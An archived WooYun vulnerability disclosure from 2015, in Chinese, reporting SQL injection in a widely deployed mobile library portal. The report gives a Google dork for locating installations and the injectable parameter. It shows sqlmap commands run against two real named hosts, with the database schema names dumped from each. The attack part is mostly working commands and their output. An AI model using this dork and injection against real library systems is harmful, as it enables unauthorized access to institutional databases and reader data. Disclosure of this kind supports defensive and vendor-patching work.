乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-22: 细节已通知厂商并且等待厂商处理中 2015-01-27: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-03-23: 细节向核心白帽子及相关领域专家公开 2015-04-02: 细节向普通白帽子公开 2015-04-12: 细节向实习白帽子公开 2015-04-02: 细节向公众公开
汇文软件通用型手机图书馆掌上门户存在sql注入漏洞
手机图书馆门户是集掌上门户,掌上APP为一体的移动服务解决方案,在移动智能时代拉近读者与图书馆之间的距离。国内大部分高校、政府、图书馆等都在用的移动cms案例很多,谷歌关键字:intitle:手机OPAC
通杀注射URL:
top_rating.action?clsNo=*
google dork结果随意选2个演示:
sqlmap -u "http://m.wxlib.cn/m/info/top_rating.action?clsNo=*" --dbs
[14:49:22] [INFO] fetching database (schema) names[14:49:22] [INFO] the SQL query used returns 19 entries[14:49:23] [INFO] retrieved: APEX_030200[14:49:24] [INFO] retrieved: APPQOSSYS[14:49:24] [INFO] retrieved: CTXSYS[14:49:25] [INFO] retrieved: DBSNMP[14:49:25] [INFO] retrieved: EXFSYS[14:49:26] [INFO] retrieved: FLOWS_FILES[14:49:27] [INFO] retrieved: LIBSYS[14:49:27] [INFO] retrieved: MDSYS[14:49:28] [INFO] retrieved: OLAPSYS[14:49:28] [INFO] retrieved: ORDDATA[14:49:29] [INFO] retrieved: ORDSYS[14:49:29] [INFO] retrieved: OUTLN[14:49:30] [INFO] retrieved: OWBSYS[14:49:30] [INFO] retrieved: SCOTT[14:49:30] [INFO] retrieved: SYS[14:49:31] [INFO] retrieved: SYSMAN[14:49:31] [INFO] retrieved: SYSTEM[14:49:32] [INFO] retrieved: WMSYS[14:49:32] [INFO] retrieved: XDBavailable databases [19]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] LIBSYS[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
sqlmap -u "http://202.200.151.19:8081/m/info/top_rating.action?clsNo=*" --dbs
[14:55:28] [INFO] fetching database (schema) names[14:55:30] [INFO] the SQL query used returns 20 entries[14:55:30] [INFO] retrieved: APEX_030200[14:55:31] [INFO] retrieved: APPQOSSYS[14:55:32] [INFO] retrieved: CTXSYS[14:55:33] [INFO] retrieved: DBSNMP[14:55:34] [INFO] retrieved: EXFSYS[14:55:34] [INFO] retrieved: FLOWS_FILES[14:55:36] [INFO] retrieved: LIBSYS[14:55:40] [INFO] retrieved: LIBSYS1[14:55:40] [INFO] retrieved: MDSYS[14:55:41] [INFO] retrieved: OLAPSYS[14:55:42] [INFO] retrieved: ORDDATA[14:55:43] [INFO] retrieved: ORDSYS[14:55:43] [INFO] retrieved: OUTLN[14:55:44] [INFO] retrieved: OWBSYS[14:55:45] [INFO] retrieved: SCOTT[14:55:46] [INFO] retrieved: SYS[14:55:46] [INFO] retrieved: SYSMAN[14:55:47] [INFO] retrieved: SYSTEM[14:55:48] [INFO] retrieved: WMSYS[14:55:49] [INFO] retrieved: XDBavailable databases [20]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] LIBSYS[*] LIBSYS1[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
危害等级:无影响厂商忽略
忽略时间:2015-04-02 10:23
暂无